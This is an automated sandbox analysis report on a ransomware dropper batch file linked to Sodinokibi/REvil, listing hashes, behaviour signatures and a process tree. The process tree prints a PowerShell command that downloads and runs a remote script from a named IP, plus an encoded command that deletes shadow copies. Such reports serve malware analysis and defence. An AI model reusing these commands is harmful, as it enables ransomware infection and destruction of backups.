Overview

overview

10

Static

static

hvQ21ebW.bat

windows7_x64

10

hvQ21ebW.bat

windows10_x64

10

Analysis

  • max time kernel
    111s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v191014
  • submitted
    10-02-2020 20:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    hvQ21ebW.bat

  • Size

    191B

  • MD5

    7eb2eb2bf474386d8d7eef5ee2aaf3ef

  • SHA1

    c9789a38150044b9ca8a4b9d350df691611f1861

  • SHA256

    29b2a12ef2c75d6bb1bdbb4536e478a386dc4082a0756adc219bbd25c724bd1c

  • SHA512

    827139be92e830cc7e7d6ac935327fe8960508ecb5e59cf338fb3cd2cc7cda12ae5686f15709bf5fec2cfb399912a9803f7b372601802bcd27e928072638b512

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/hvQ21ebW

Extracted

Language
ps1
Source

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

    ransomwaresodinokibi
  • Discovering connected drives 3 TTPs 7 IoCs
    ransomware
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Drops file in Program Files directory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\hvQ21ebW.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1184
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hvQ21ebW');Invoke-PBEESOQZ;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Discovering connected drives
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      PID:1456
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:2020
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1568

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit